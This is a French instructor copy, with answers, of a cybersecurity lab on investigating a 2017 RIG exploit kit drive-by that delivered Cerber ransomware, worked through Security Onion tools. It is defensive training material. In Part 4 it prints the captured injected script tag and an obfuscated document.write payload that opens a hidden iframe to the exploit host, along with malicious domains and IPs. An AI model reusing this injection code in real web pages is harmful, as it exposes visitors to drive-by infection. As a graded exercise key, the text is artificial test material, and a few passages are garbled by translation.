27.2.15 – Travaux pratiques – Enquêter sur une Exploitation

0

27.2.15 – Travaux pratiques – Enquêter sur une exploitation d’un logiciel malveillant

Remarque à l’intention de l’instructeur : la couleur de police rouge ou les surlignages gris indiquent que le texte n’apparaît que dans la copie de l’instructeur.

Objectifs

Au cours de ces travaux pratiques, vous allez:

Partie 1: Utiliser Kibana pour en savoir plus sur une exploitation malveillante

Partie 2: Enquêter sur l’exploit avec Sguil

Partie 3: Utiliser Wireshark pour enquêter sur une attaque

Partie 4: Examiner les artifacts d’exploits

Ces travaux pratiques sont basés sur un exercice du site web malware-traffic-analysis.net qui est une excellente ressource pour apprendre à analyser les attaques de réseaux et d’hôtes. Merci à [email protected] pour l’autorisation d’utiliser le matériel de son site.

Remarque : Cet atelier nécessite un ordinateur hôte pouvant accéder à Internet.

Contexte/scénario

Vous avez décidé d’interviewer pour un emploi dans une entreprise de taille moyenne en tant qu’analyste de la cybersécurité de niveau 1. Il vous a été demandé de démontrer votre capacité à identifier les détails d’une attaque au cours de laquelle un ordinateur a été compromis. Votre objectif est de répondre à une série de questions en utilisant Sguil, Kibana et Wireshark dans Security Onion.

Vous avez reçu les détails suivants sur l’événement:

  • L’événement s’est produit en janvier 2017.
  • Il a été découvert par le NIDS Snort.

Ressources requises

  • La machine virtuelle Security Onion
  • Accès Internet

Instructions

Partie 1 : Utiliser Kibana pour en savoir plus sur une exploitation malveillante

Dans la partie 1, utilisez Kibana pour répondre aux questions suivantes. Pour vous aider à démarrer, vous êtes informé que l’attaque a eu lieu à un moment donné au cours du mois de janvier 2017. Vous devrez identifier l’heure exacte.

Étape 1 : Affinez le délai.

a. Ouvrez une session sur la machine virtuelle Security Onion avec le nom d’utilisateur analyst et le mot de passe cyberops .

b. Ouvrez Kibana ( analyste comme nom d’utilisateur et cyberops comme mot de passe) et définissez une plage de temps absolue pour restreindre le focus afin de consigner les données à partir de janvier 2017.

c. Vous verrez apparaître un graphique avec une seule entrée s’affichant. Pour afficher plus de détails, vous devez réduire la durée affichée. Affinez la plage de temps dans la visualisation Nombre total de journaux au fil du temps en cliquant et en faisant glisser la souris pour sélectionner une zone autour du point de données du graphique. Vous devrez peut-être répéter ce processus jusqu’à ce que vous voyez des détails dans le graphique.

Remarque: Utilisez la touche <Esc> pour fermer toutes les boîtes de dialogue susceptibles d’interférer avec votre travail.

Étape 2 : Localiser l’événement à Kibana

a. Après avoir réduit la plage de temps dans le tableau de bord Kibana principal, accédez au tableau de bord NIDS Alert Data en cliquant sur NIDS.

b. Effectuez un zoom avant sur l’événement en cliquant et en faisant glisser la visualisation NIDS -Alertes au fil du temps. Étant donné que l’événement s’est produit sur une très courte période de temps, sélectionnez uniquement la ligne de tracé du graphique. Effectuez un zoom avant jusqu’à ce que votre écran ressemble à celui ci-dessous.

c. Cliquez sur le premier point de la chronologie pour filtrer uniquement le premier événement.

d. Maintenant, affichez les détails des événements qui se sont produits à ce moment-là. Faites défiler jusqu’au bas du tableau de bord jusqu’à ce que vous voyez la section Alertes NIDS de la page. Les alertes sont organisées selon le temps. Développez le premier événement de la liste en cliquant sur la flèche du pointeur située à gauche de l’horodatage.

e. Consultez les détails détaillés de l’alerte et répondez aux questions suivantes:

Quelle est l’heure de la première alerte NIDS détectée à Kibana?

27 janvier 2017 – 22:54:43

Quelle est l’adresse IP source dans l’alerte?

172.16.4.193

Quelle est l’adresse IP de destination dans l’alerte?

194.87.234.129

Quel est le port de destination dans l’alerte? Quel est ce service?

80, HTTP

Quelle est la classification de l’alerte?

Activité cheval de Troie

Quel est le nom du pays géographique de destination?

Russie

f. Dans un navigateur Web sur un ordinateur qui peut se connecter à Internet, accédez au lien fourni dans le champ signature_info de l’alerte. Cela vous amène à la règle d’alerte Snort des menaces émergentes pour l’exploit. Il y a une série de règles affichées. Cela s’explique par le fait que les signatures peuvent changer au fil du temps ou que de nouvelles règles plus précises sont élaborées. La règle la plus récente se trouve en haut de la page. Examinez les détails du règles.

Quelle est la famille de logiciels malveillants pour cet événement ?

Exploit_Kit_RIG

Quelle est la gravité de l’exploit ?

La gravité de la signature est Majeure.

Qu’est-ce qu’un kit d’exploit? (EK) Recherche sur Internet pour répondre à cette question.

ordinateur avec des logiciels malveillants.

Les kits d’exploitation utilisent fréquemment ce qu’on appelle une attaque de conduite pour lancer la campagne d’attaque. Dans une attaque en voiture, un utilisateur visitera un site Web qui devrait être considéré comme sûr. Cependant, les acteurs de la menace trouvent des moyens de compromettre les sites Web légitimes en trouvant des vulnérabilités sur les serveurs Web qui les hébergent. Ces vulnérabilités permettent aux acteurs de menaces d’insérer leur propre code malveillant dans le code HTML d’une page Web. Le code est fréquemment inséré dans un iFrame. iFrames permettent d’afficher le contenu de différents sites Web dans la même page Web. Les acteurs de menaces créent fréquemment un iFrame invisible qui connecte le navigateur à un site Web malveillant. Le code HTML du site Web qui est chargé dans le navigateur contient souvent un JavaScript qui envoie le navigateur vers un autre site Web malveillant ou télécharge des logiciels malveillants jusqu’à ce que l’ordinateur.

Étape 3 : Voir la transcription CAPme!

a. Cliquez sur la valeur alert_id, vous pouvez faire pivoter vers CAPMe pour inspecter la transcription de l’événement.

Dans la fenêtre de CapMe! , vous pouvez voir la transcription de la session. Il affiche les transactions entre l’ordinateur source, en bleu, et les destinations auxquelles la source accède. Beaucoup d’informations précieuses, y compris un lien vers le fichier pcap lié à cette alerte, sont disponibles dans la transcription.

Examinez le premier bloc de texte bleu. Il s’agit de la requête de la source vers le serveur web de destination. Notez que deux URL sont répertoriées dans ce bloc. Le premier est étiqueté comme SRC: REFERER. Il s’agit du site Web auquel l’ordinateur source a accédé pour la première fois. Cependant, le serveur a référé le navigateur à la requête HTTP GET vers le serveur SRC:HOST. Quelque chose dans le HTML a envoyé la source à ce site. On dirait que ça pourrait être une attaque en voiture!

Quel site Web l’utilisateur a-t-il l’intention de se connecter?

www.homeimprovement.com

À quelle URL le navigateur a-t-il renvoyé l’utilisateur?

ty.benme.com

Quel type de contenu est demandé par l’hôte source à partir de tybenme.com? Pourquoi cela pourrait-il être un problème? Regardez aussi dans le bloc serveur DST de la transcription.

Le contenu est affiché au format gzip. Il peut s’agir d’un fichier malveillant dont le téléchargement a été demandé. Il s’agit probablement d’un fichier malveillant. Parce qu’il est compressé, le contenu du fichier est masqué. Il n’est pas facile de voir ce qu’il y a dans le dossier.

b. Fermez l’onglet du navigateur de CapME!.

c. En haut du tableau de bord d’alerte NIDS, cliquez sur l’entrée HTTP située sous l’en-tête Zeek Hunting .

d. Dans le tableau de bord HTTP, vérifiez que votre plage de temps absolue inclut 2017-01-27 22:54:30 .000 à 2017-01-27 22:56:00 .000.

e. Faites défiler jusqu’à la section HTTP – Sites du tableau de bord.

Quels sont certains des sites Web qui sont répertoriés ?

www.bing.com
p27dokhpz2n7nvgr.1jw2lx.top
homeimprovement.com
tyu.benme.com
www.google-analytics.com
api.blockcipher.com
spotsbill.com
fpdownload2.macromedia.com
retrotip.visionurbana.com.ve

Nous devrions connaître certains de ces sites Web à partir de la transcription que nous avons lu plus tôt. Tous les sites affichés ne font pas partie de la campagne d’exploitation. Recherchez les URL en les recherchant sur Internet. Ne vous connectez pas à eux. Placez les URL entre guillemets lorsque vous effectuez vos recherches.

Lequel de ces sites fait probablement partie de la campagne d’exploitation ?

p27dokhpz2n7nvgr.1jw2lx.top
homeimprovement.com
tyu.benme.com
spotsbill.com
retrotip.visionurbana.com.ve

Quels sont les types HTTP – MIME répertoriés dans le Tag Cloud?

image/jpeg, text/plain, text/html, image/gif, image/png, application/javascript, application/x-shockwave-flash, text/json

Partie 2 : Enquêter sur l’Exploit avec Sguil

Dans la partie 2, vous utiliserez Sguil pour vérifier les alertes IDS et recueillir plus d’informations sur la série d’événements liés à cette attaque.

Remarque: Les ID d’alerte utilisés dans ce laboratoire sont par exemple uniquement. Les ID d’alerte sur votre machine virtuelle peuvent être différents.

Étape 1 : Ouvrez Sguil et localisez les alertes.

a. Lancez Sguil depuis le bureau. Connectez-vous avec le nom d’utilisateur analyst et le mot de passe cyberops. Activez tous les capteurs et cliquez sur Démarrer.

b. Localisez le groupe d’alertes du27 janvier 2017.

Selon Sguil, quels sont les horodatages pour la première et la dernière des alertes qui se sont produites dans environ une seconde de l’autre?

22:54:42 à 22:55:28 L’ensemble de l’exploit s’est produit en moins d’une minute.

Étape 2: Enquêtez les alertes à Sguil.

a. Cochez les cases Afficher les données du paquet et Afficher la règle pour afficher les informations du champ d’en-tête du paquet et la règle de signature IDS associée à l’alerte.

b. Sélectionnez l’ID d’alerte 5.2 (Message d’événement ET CURRENT Evil Redirector Leading to EK 12 juil. 2016).

Selon la règle de signature IDS, quelle famille de logiciels malveillants a déclenché cette alerte? Vous devrez peut-être faire défiler la signature d’alerte pour trouver cette entrée.

Malware_family PseudoDarkLeech

c. Agrandir la fenêtre Sguil et dimensionner la colonne Message d’événement afin que vous puissiez voir le texte de l’intégralité du message. Consultez les Messages d’événement pour chacun des ID d’alerte liés à cette attaque.

Selon les Messages d’événements de Sguil, quel kit d’exploit (EK) est impliqué dans cette attaque?

RIG EK exploite

Au-delà de l’étiquetage de l’attaque comme une activité de cheval de Troie, quelles autres informations sont fournies concernant le type et le nom du logiciel malveillant concerné?

logiciel de rançon, Cerber

Selon votre meilleure estimation en regardant les alertes jusqu’à présent, quel est le vecteur de base de cette attaque? Comment s’est déroulée l’attaque?

L’attaque semble avoir eu lieu en visitant une page Web malveillante.

Étape 3 : Voir les transcriptions des événements

a. Cliquez avec le bouton droit de la souris sur l’ID d’alerte associé 5.2 (Message d’événement ET CURRENT_EVENTS Evil Redirecteur menant à EK le 12 juil. Sélectionnez Transcription dans le menu comme indiqué sur la figure.

Quels sont les sites Web référents et hôtes impliqués dans le premier événement SRC? Que pensez-vous que l’utilisateur a fait pour générer cette alerte?

L’utilisateur a lancé une recherche sur Bing avec les termes de recherche “amélioration de l’habitat remodelant votre cuisine”. L’utilisateur a cliqué sur le lien www.homeimprovement.com et a visité ce site.

b. Cliquez avec le bouton droit de la souris sur l’ID d’alerte 5.24 (adresse IP source 139.59.160.143 et message d’événement ET CURRENT_EVENTS Evil redirecteur menant à EK le 15 mars 2017) et choisissez Transcription pour ouvrir une transcription de la conversation.

c. Reportez-vous à la transcription et répondez aux questions suivantes:

Quel genre de requête s’agit-il?

Requête HTTP/1.1 GET

Des fichiers ont-ils été requis ?

dle_js.js

Quelle est l’adresse URL du site de référence et du site d’hôte ?

Le site Web référent était www.homeimprovement.com/remodeling-your-kitchen-cabinets.html et le site Web hôte était retrotip.visionbura.com.ve.

Comment le contenu est encodé?

gzip

d. Fermez la fenêtre de transcription actuelle. Dans la fenêtre Sguil, cliquez avec le bouton droit sur l’ID d’alerte 5.25 (Message d’événement ET CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2) et ouvrez la transcription. Selon les informations contenues dans la transcription répondre aux questions suivantes:

Combien de demandes et de réponses ont été en cause dans cette alerte?

3 demandes et 3 réponses

Quelle était la première demande ?

GET /?ct=Vivaldi&biw=Vivaldi.95ec

Qui était le référent ?

www.homeimprovement.com/remodeling-your-kitchen-cabinets.html

À qui était la requête du serveur hôte ?

tyu.benme.com

La réponse a-t-elle été encodée ?

Oui, gzip

Quelle était la deuxième requête ?

POSTE /?oq=CEh3h8…. Vivaldi

À qui était la requête du serveur hôte ?

tyu.benme.com

La réponse a-t-elle été encodée ?

Oui, gzip

Quelle était la troisième requête?

GET /?biw=SeaMonkey.105….

Qui était le référent?

http://tyu.benme.com/?biw…

Quel était le type de contenu de la troisième réponse ?

application/x-shockwave-flash

Quels étaient les 3 premiers caractères des données de la réponse? Les données démarrent après la dernière entrée de DST:

CWS

CWS est une signature de fichier. Les signatures de fichier aident à identifier le type de fichier qui est représenté différents types de données. Accédez au site Web suivant https://en.wikipedia.org/wiki/List_of_file_signatures. Utilisez Ctrl-F pour ouvrir une zone de recherche.

Recherchez cette signature de fichier pour savoir quel type de fichier a été téléchargé dans les données.

Quel type de fichier a été téléchargé ? Quelle application utilise ce type de fichier?

swf, Adobe Flash

e. Fermez la fenêtre de transcription.

f. Cliquez à nouveau avec le bouton droit sur le même ID et choisissez Network Miner. Cliquez sur l’onglet Files.

Combien y a-t-il de fichiers et quels sont les types de fichiers ?

Il y a trois fichiers. Deux sont des fichiers .html et un est le fichier .swf.

Partie 3 : Utiliser Wireshark pour enquêter sur une attaque

Dans la partie 3, vous pivoterez vers Wireshark pour examiner de près les détails de l’attaque.

Étape 1 : Pivotez vers Wireshark et modifiez les paramètres.

a. Dans Sguil, cliquez avec le bouton droit de la souris sur l’ID d’alerte 5.2 (Message d’événement ET CURRENT_EVENTS Evil Redirector Leading to EK Jul 12 2016) et faites pivoter pour sélectionner Wireshark dans le menu. Le pcap associé à cette alerte s’ouvrira dans Wireshark.

b. Le paramètre Wireshark par défaut utilise un temps relatif par paquet qui n’est pas très utile pour isoler l’heure exacte d’un événement. Pour résoudre ce problème, sélectionnez Affichage > Format d’affichage de l’heure > Date et heure du jour , puis répétez une seconde fois Affichage > Format d’affichage de l’heure > Secondes. Maintenant, votre colonne Wireshark Time a la date et l’horodatage. Redimensionnez les colonnes pour rendre l’affichage plus clair si nécessaire.

Étape 2 : Enquêter sur le trafic HTTP.

a. Dans Wireshark, utilisez le filtre d’affichage http.request pour filtrer uniquement les demandes Web.

b. Sélectionnez le premier paquet. Dans la zone de détails des paquets, développez les données de couche d’application Hypertext Transfer Protocol.

Quel site Web a dirigé l’utilisateur vers le site www.homeimprovement.com ?

Bing

Étape 3 : Afficher les objets HTTP.

a. Dans Wireshark, choisissez Fichier > Exporter des objets > HTTP.

b. Dans la fenêtre de liste Exporter des objets HTTP, sélectionnez le paquet remodeling-your-kitchen-cabinets.html et enregistrez-le dans votre dossier personnel.

c. Fermez Wireshark. Dans Sguil, cliquez avec le bouton droit sur l’ID d’alerte 5.24 (adresse IP source 139.59.160.143 et message d’événement ET CURRENT_EVENTS Evil redirecteur menant à EK le 15 mars 2017) et choisissez Wireshark pour faire pivoter vers Wireshark. Appliquez un filtre d’affichage http.request et répondez aux questions suivantes:

À quoi sert la requête http ?

Un fichier JavaScript nommé dle_js.js.

Qu’est-ce que le serveur hôte ?

retrotip.visionurbana.com.ve

d. Dans Wireshark, accédez à Fichier > Exporter des objets > HTTP et enregistrez le fichier JavaScript dans votre dossier personnel.

e. Fermez Wireshark. Dans Sguil, cliquez avec le bouton droit de la souris sur l’ID d’alerte 5.25 (Message d’événement ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2) et choisissez Wireshark pour faire pivoter vers Wireshark. Appliquez un filtre d’affichage http.request. Notez que cette alerte correspond aux trois requêtes GET, POST et GET que nous avons examinées plus tôt.

f. Lorsque le premier paquet est sélectionné, dans la zone de détails des paquets, développez les données de couche d’application Hypertext Transfer Protocol. Cliquez avec le bouton droit sur les informations de l’hôte et choisissez Appliquer en tant que colonne pour ajouter les informations de l’hôte aux colonnes de la liste de paquets, comme illustré dans la figure.

g. Pour faire de la place pour la colonne Hôte, cliquez avec le bouton droit sur l’en-tête de colonne Longueur et décochez la case. Cela supprimera la colonne Longueur de l’affichage.

h. Les noms des serveurs sont désormais clairement visibles dans la colonne Hôte de la liste des paquets.

Étape 4 : Créez un hachage pour un fichier de programme malveillant exporté.

Nous savons que l’utilisateur avait l’intention d’accéder à www.homeimprovement.com, mais le site a renvoyé l’utilisateur à d’autres sites. Finalement, des fichiers ont été téléchargés sur l’hôte à partir d’un site malveillant.

Dans cette partie du laboratoire, nous allons accéder aux fichiers qui ont été téléchargés et soumettre un hachage de fichier à VirusToTAL pour vérifier qu’un fichier malveillant a été téléchargé.

a. Dans Wireshark, allez dans Fichier > Exporter des objets > HTTP et enregistrez les deux fichiers text/html et le fichier application/x-shockwave-flash dans votre répertoire personnel.

b. Maintenant que vous avez enregistré les trois fichiers dans votre dossier personnel, testez si l’un des fichiers correspond à une valeur de hachage connue pour les logiciels malveillants sur virustotal.com. Éxecutez une commande ls -l pour regarder les fichiers enregistrés dans votre répertoire personnel. Le fichier flash porte le mot SeaMonkey près du début du nom de fichier long. Le nom de fichier commence par%3FBIW=SeaMonkey . Utilisez la commande ls -l avec grep pour filtrer le nom du fichier avec le pattern seamonkey. L’option -i ignore la distinction de casse.

analyst@SecOnion:~$ ls -l | grep -i seamonkey
-rw-r--r-- 1 analyst analyst 16261 Jun 9 05:50 %3fbiw=SeaMonkey.105qj67.406x7d8b3&yus=SeaMonkey.78vg115.406g6d1r6&br_fl=2957&oq=pLLYG OAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E- qKSErM62V7FjLhTJg&q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF- qoVzcCgWRxfs&ct=SeaMonkey&tuif=1166

c. Générez un hachage SHA-1 pour le fichier flash SeaMonkey avec la commande sha1sum suivie du nom de fichier. Tapez les 4 premières lettres%3fb du nom de fichier, puis appuyez sur la touche de tabulation pour remplir automatiquement le reste du nom de fichier. Appuyez sur Entrée et sha1sum calculera une valeur de hachage de longueur fixe de 40 chiffres.

Mettez en surbrillance la valeur de hachage, cliquez avec le bouton droit et copiez-la Le sha1sum est mis en surbrillance dans l’exemple ci-dessous. Remarque: N’oubliez pas d’utiliser la complétion d’onglet.

analyst@SecOnion:~$ sha1sum
%3fbiw\=SeaMonkey.105qj67.406x7d8b3\&yus\=SeaMonkey.78vg115.406g6d1r6\&br_fl\
=2957\&oq\=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9EqKSErM62V7FjLhTJg\&q\=
w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfFqoVzcCgWRxfs\&ct\=SeaMonkey\&tuif\=1166

97a8033303692f9b7618056e49a24470525f7290 %3fbiw=SeaMonkey.105qj67.406x7d8b3&yus=SeaMo
nkey.78vg115.406g6d1r6&br_fl=2957&oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E
-qKSErM62V7FjLhTJg&q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRx
fs&ct=SeaMonkey&tuif=1166

d. Vous pouvez également générer une valeur de hachage à l’aide de NetworkMiner. Accédez à Sguil et cliquez avec le bouton droit de la souris sur l’ID d’alerte 5.25 (Message d’événement ET CURRENT_EVENTS RIG EK Struct Mar 13 2017 M2) et sélectionnez Réseau Minor pour faire pivoter vers Réseau Minor. Sélectionner l’onglet Files . Dans cet exemple, cliquez avec le bouton droit de la souris sur le fichier avec l’extension swf et sélectionnez Calculate MD5/SHA1/SHA256 hash. Comparez la valeur de hachage SHA1 avec celle de l’étape précédente. Les valeurs de hachage SHA1 doivent être les mêmes.

e. Ouvrez un navigateur Web et allez sur virustotal.com. Cliquez sur l’onglet Rechercher et entrez la valeur de hachage pour rechercher une correspondance dans la base de données des hachages de malwares connus. VirusToTAL renvoie une liste des moteurs de détection de virus qui ont une règle qui correspond à ce hachage.

f. Examinez les onglets Détection et Détails. Passez en revue les informations fournies sur cette valeur de hachage.

Qu’est-ce que VirusToTAL vous a dit à propos de ce fichier ?

Les réponses varieront, mais à partir de la réponse, vous pouvez vérifier que le SWF fait partie du kit d’exploitation RigEK. 32 des 55 programmes antivirus ont des règles qui identifient ce hachage comme provenant d’un fichier malveillant.

g. Fermez le navigateur et Wireshark. Dans Sguil, utilisez l’ID d’alerte 5.37 (Message d’événement ET CURRENT_EVENTS RIG EK Landing 12 sept. 2016 T2) pour pivoter vers Wireshark et examiner les requêtes HTTP.

Y a-t-il des similitudes avec les alertes antérieures?

Oui, les alertes affichent les requêtes GET, POST et GET à tyu.benme,com

Les fichiers sont-ils similaires? Voyez-vous des différences?

Oui, deux fichiers texte/html et un fichier flash. Les noms de fichiers sont différents.

h. Créez un hachage SHA-1 du fichier SWF comme vous l’avez fait précédemment.

Est-ce le même logiciel malveillant qui a été téléchargé lors de la session HTTP précédente ?

Oui. Les deux hachages correspondent même si les noms de fichiers sont différents.

i. À Sguil, les 4 dernières alertes de cette série sont liées, et elles semblent également être post-infection.

Pourquoi semble-t-il être post-infection?

Les quatre alertes concernent la communication avec le serveur malveillant.

Qu’est-ce qui est intéressant à propos de la première alerte dans les 4 dernières alertes de la série ?

Envoie un code UDP à un serveur d’enregistrement de ransomware

Quel type de communication a lieu dans les deuxième et troisième alertes de la série et qu’est-ce qui la rend suspecte ?

Ce sont des requêtes DNS qui sont initiées à partir de l’hôte local ; cependant, il est peu probable qu’ils soient le résultat d’une activité normale de l’utilisateur. Ils doivent être envoyés par le fichier malveillant. Le domaine .top ne ressemble pas à un nom de domaine valide.

j. Allez sur virustotal.com et effectuez une recherche d’URL pour le domaine .top utilisé dans l’attaque.

Quel est le résultat ?

C’est un domaine malveillant, qui déclenche toujours des alertes

k. Examinez la dernière alerte de la série dans Wireshark. S’il a des objets qui valent la peine d’être sauvegardés, exportez-les et enregistrez-les dans votre dossier personnel.

Quels sont les noms de fichiers le cas échéant?

Oui. EE7EA-D39….

Partie 4 : Examinez les artifacts d’exploitation.

Dans cette partie, vous examinerez certains des documents que vous avez exportés à partir de Wireshark.

a. Dans Security Onion, ouvrez le fichier remodeling-your-kitchen-cabinets.html en utilisant l’éditeur de texte de votre choix. Cette page Web a initié l’attaque.

Pouvez-vous trouver les deux endroits de la page Web qui font partie de l’attaque de drive-by qui a déclenché l’exploit? Conseil: le premier se trouve dans le <head> et le second se trouve dans la zone <body> de la page.

La balise de script dans l’en-tête charge le fichier JavaScript dle_js.js de retrotip.visionurbana.com.ve. L’iframe qui charge le contenu de tyu.benme.com est défini dans le corps HTML.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Rénovation de vos armoires de cuisine | Amélioration de la maison</title>

<link rel="alternate" type="application/rss+xml"
href="//www.homeimprovement.com/?feed=rss2" title="Dernières publications
d'amélioration essentiel" />

<link rel="alternate" type="application/rss+xml"
href="//www.homeimprovement.com/?feed=comments-rss2" title="Derniers commentaires
d'amélioration essentiel" />

<link rel="pingback" href="//www.homeimprovement.com/xmlrpc.php" />

<link rel="shortcut icon" href="//www.homeimprovement.com/wpcontent/themes/arras/images/favicon.ico" />

<script type="text/javascript"
src="//retrotip.visionurbana.com.ve/engine/classes/js/dle_js.js"></script>
<!-- Tout en un SEO Pack 2.3.2.3 par Michael Torbert de Semper Fi Web Design [291,330]
—>
<meta name="description" content="Installing cabinets in a remodeled kitchen require
some basic finish carpentry skills. Before starting any installation, it's a good idea
to mark some level and" />

<meta name="keywords" content="cabinets,kitchen,kitchen cabints,knobs,remodel" />
<some output omitted>

b. Ouvrez le fichier dle_js.js dans le choix de l’éditeur de texte et examinez-le.

document.write('<div class="" style="position:absolute; width:383px; height:368px;
left:17px; top:-858px;"> <div style="" class=""><a>head</a><a class="head-menu-2">
</a><iframe
src="https://tyu.benme.com/?q=zn_QMvXcJwDQDofGMvrESLtEMUbQA0KK2OH_76iyEoH9JHT1vrTUSkrtt
gWC&biw=Amaya.81lp85.406f4y5l9&oq=elTX_fUlL7ABPAuy2EyALQZnlY0IU1IQ8fj630PWwUWZ0pDRqx29
UToBvdeW&yus=Amaya.110oz60.406a7e5q8&br_fl=4109&tuif=5364&ct=Amaya" width=290
height=257 ></ifr' +'ame> <a style=""></a></div><a class="" style="">temp</a></div>');

Que fait le fichier?

Javascript document.write() écrira du contenu sur la page Web, créant un iframe, qui amène l’utilisateur à un URI sur tyu.benme.com

Comment le code dans le fichier javascript essaie-t-il d’éviter la détection ?

En divisant la balise iframe de fin en deux morceauxThe </ifr’ +’ame>

c. Dans un éditeur de texte, ouvrez le fichier texte/html qui a été enregistré dans votre dossier personnel avec Vivaldi dans le nom de fichier.

Examinez le fichier et répondez aux questions suivantes :

Quel genre de fichier c’est?

Une page Web HTML

Quelles sont les choses intéressantes à propos de l’iframe ? Est-ce que ça appelle quelque chose ?

Il est caché. Il appelle une fonction start()

Que fait la fonction start () ?

Il écrit dans la fenêtre du navigateur. Il crée un formulaire HTML et soumet la variable NormalURL via POST. La variable NormalURL équivaut à un URI sur tyu.benme.com.

Selon vous, quel est le but de la fonction getBrowser () ?

La fonction getBrowser() détermine le type de navigateur dans lequel la page Web est affichée.

Remarques générales

Les kits d’exploits sont des exploits assez complexes qui utilisent une variété de méthodes et de ressources pour mener une attaque. Il est intéressant de noter que les EK peuvent être utilisés pour fournir diverses charges utiles de logiciels malveillants. En effet, le développeur EK peut offrir le kit d’exploitation en tant que service à d’autres acteurs de menace. Par conséquent, RIG EK a été associé à un certain nombre de charges utiles différentes de logiciels malveillants. Les questions suivantes peuvent vous obliger à approfondir les données à l’aide des outils qui ont été introduits dans ce laboratoire.

1. L’EK a utilisé un certain nombre de sites Web. Complétez le tableau ci-dessous.

URL Adresse IP Fonction
www.bing.com S. o. liens de moteur de recherche vers une page Web légitime
www.homeimprovement.com 104.28.18.74 iFrame malveillant redirige vers un site malveillant
retrotip.visionurbana.com.ve 139.59.160.143 exécute un javascript malveillant
tyu.benme.com 194.87.234.129 fournit un fichier Adobe Flash malveillant, exploite la page de destination.
S. o. 90.2.10.0 Serveur d’enregistrement du rançongiciel Cerber
p27dokhpz2n7nvgr.1jjw2lx.top 198.105.151.50 page de rançongiciel cerber

2. Il est utile de « raconter l’histoire » d’un exploit pour comprendre ce qui s’est passé et comment il fonctionne. Commencez par l’utilisateur qui recherche sur Internet avec Bing. Cherchez sur le Web pour plus d’informations sur le RIG EK pour vous aider.

Les réponses varieront. Le but de cette question est d’amener les élèves à réfléchir à la nature en plusieurs étapes des EK et à la complexité des cyberattaques en général.
L’utilisateur recherche avec Bing des informations sur les améliorations de l’habitat. L’utilisateur clique sur un lien vers www.homeimprovments.com. Ce site Web a été compromis par un acteur malveillant. Un javascript s’exécute qui finit par télécharger un fichier Adobe Flash malveillant. Le fichier Flash exécute et télécharge des logiciels malveillants. Une fois le logiciel malveillant installé, il s’enregistre auprès d’un serveur CnC.

Subscribe
Notify of
guest

0 Comments
Inline Feedbacks
View all comments